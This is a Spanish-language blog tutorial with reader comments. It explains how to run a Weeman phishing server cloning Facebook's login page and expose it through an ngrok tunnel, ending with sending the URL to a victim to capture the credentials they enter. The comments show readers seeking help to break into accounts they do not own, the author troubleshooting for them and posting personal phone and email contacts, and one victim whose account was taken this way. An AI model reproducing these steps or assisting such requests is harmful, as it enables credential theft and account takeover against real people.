Weeman y Ngrok son las mejores herramienta para realizar ataques de phishing actualmente. Crea tu propio servidor de phishing para hackear cuentas de Facebook u otra red social.
Con Weeman podemos tener un servidor HTTP para phishing en Python, además tiene soporte para la mayoría de los sitios web (los más grandes). Por su lado, ngrok garantiza la creación de túneles seguros a un servidor local.
Anteriormente, publiqué una entrada sobre cómo hackear Facebook con Phishing. Dicho método es muy sencillo y a la vez difícil de dar resultados por ser muy predecible. Ahora veremos otra situación, que con algunos ajustes, las probabilidades de tener éxito aumentan considerablemente.
1. Weeman y Ngrok
- Primero descargamos y extraemos Ngrok
Una vez extraído, copiamos el archivo a la carpeta de binarios /usr/bin para ejecutarlo posteriormente.
sudo cp /ruta/ngrok /usr/bin
Descargar y extraer Ngrok
- Descargamos Weeman desde github
git clone https://github.com/samyoyo/weeman.git- Para iniciar Weeman, abra la terminal y ejecute los siguientes comandos:
cd weeman
chmod +x weeman.py
python weeman.py
show
Descargar e iniciar Weeman
2. Hackear Facebook con Phishing
- Inicie Weeman con el comando show:
Comando show en Weeman
- Una vez ejecutado weeman, abra una nueva terminal y ejecute ngrok
ngrok http 8080- Ahora en la terminal con Weeman abierto, ejecute los siguientes comandos:
set url https://facebook.com
set action_url xxx_ngrok.io
set port 8080
run
Comandos Set y run
Por supuesto, xxx_ngrok.io es la URL generada al ejecutar Ngrok anteriormente, ese enlace le servirá como sitio web de Phishing.
- La URL generada por Ngrok se encuentra en HTTP, para utilizar HTTPS escriba el siguiente comando al ejecutar Ngrok:
ngrok http -bind-tls=true 8080
Phishing HTTPS con Ngrok
Por último, envíe la URL a la víctima y espere a que abra ese enlace e inicie sesión con sus credenciales.
Captura de credenciales de Facebook
3. Tutorial: Crear un servidor Phishing
Consulte el tutorial paso a paso para una mejor comprensión de cómo crear un servidor phishing para, por ejemplo, capturar el usuario y contraseña de una cuenta de Facebook.
¡SOLO UTILICE CON FINES EDUCATIVOS! ¡Si te ha gustado el artículo, no dudes en compartirlo con los demás 😉 !
al intentar ejecuar ngrok me sale permiso denegado
Hola, qué distribución usas y que comando ejecutaste?
al hacer todos los prosesos, copio el link en el navegador y me sale la pagina de apache2 del servidor ?
como edito /var/www/html/index.html antes. te lo agradesco de ante mano espero me puedas ayudar
Hola, elimina el archivo index.html
Hola que sistema operativo usan ?
Kali Linux
Hola. Necesito tu ayuda. Donde te puedo encontrar ?
Hola que tal Noemi!
Vía correo: alexynior15@gmail.com o Telegram/WhatsApp: +51927742190
Necesito ayuda
En qué te puedo ayudar Dana?
oye amigo quiero hackear una cuenta que no me se la contraseña. ayudame
¿Cuál es el problema con el programa?
Hola la carpeta de binarios donde la encuentro o q onda
En general,
/binse usa para binarios del sistema,/usr/binpara aplicaciones predeterminadas con la distro y/usr/local/binpara cosas que instala el usuario.Hola porque cuando creo un ngrok ahora solo me sale que el tunel esta caido? Hace unos dias me funcionaba bien
¿Alguna captura amigo?
Te la envie por WhatsApp
Te respondí 👍
amigo tengo un problema aparece lo siguiente ./ngrok: no se puede ejecutar fichero binario: Formato de ejecutable incorrecto
que debo hacer en ese caso sera que me puedes explicar
Hola, realiza lo siguiente:
Localiza tu archivo ngrok y ejecuta lo siguiente:
sudo cp ngrok /usr/local/binEso hace que puedas ejecutar el comando desde cualquier ubicación..
aparece lo mismo me das tu correo para contactarte
Telegram o Whatsapp: +51927742190
esta funcionando??
Aún no
se puede con windows 7???
Weeman no tiene soporte para Windows :/
Hola amigo, te puedo preguntar algo por interno ?
Claro, escríbeme a la fanpage
hola alguien me puede explicar con mas detalle ps lo hago y me sale una url local y tengo una cuenta en ngrok pero cuando lo inicio se queda en reconecting y no pasa de ahi al correo josearleyreyesferrera@gmail.com
Hola Jose, puedes intentar alguna de estas soluciones.
y luego de hacer el proceso como obtengo los datos?
Se captarán y mostrarán en pantalla
Te escribi a tu ws pero no te llega amigo
Estoy sin WhatsApp :/ puede ser Telegram?
Holaa esta funcionando?? ayer y hoy me sale: ” tunnel is not found. ” porque seria??
Hola Emanuel! Intenta reiniciar el túnel, tal vez ha expirado la sesión.
me pasa con cualquier nuevo tunel que quiero volver a crear me sale siempre lo mismo
Al parecer Ngrok está caído :/
sabes si sigue caido? o por donde podria ver si esta online o no?
Sigue caído Emanuel :/ Serveo igual
Amigo a mi novia le hackearon la cuenta de facebook con esta url https://0d6f5735.ngrok.io/ alguna manera de recuperarla.
pls
Con el correo electrónico Luis
esa es la cuestión no recuerda el password del correo ni la respuesta a la pregunta de seguridad alguna manera de recuperar el correo? pls
No Luis :/
Hola a mi me quisieron hakear con este metodo… Pero no puse mi usuario ni mi contrseña.. solo abri y cerre la pagina. Corro algun riesgo igual? Gracias y disculpa la molestia
Hola Juan! Ninguna molestia…
No, si no ingresaste nada no tienes de que preocuparte…
Hola Amigo Quisiera Un Video Para Entender Como Usar No Hay Ninguno Dispoñible?
Hola Manuel, Youtube lo eliminó y no guardé una copia :/. Tal vez realice uno próximamente
Hola amigo tendrias o conoces otra forma para facebook?
Sí, en el buscador de esta página puedes buscar ‘facebook’ y encontrarás otras herramientas. Esta semana subo un vídeo de Hacking Facebook con el CMD 🙂
SIgue sin funcionar amigo?
Sí Emanuel, Ngrok caído :/
Porque no salen las passw? solo sale el email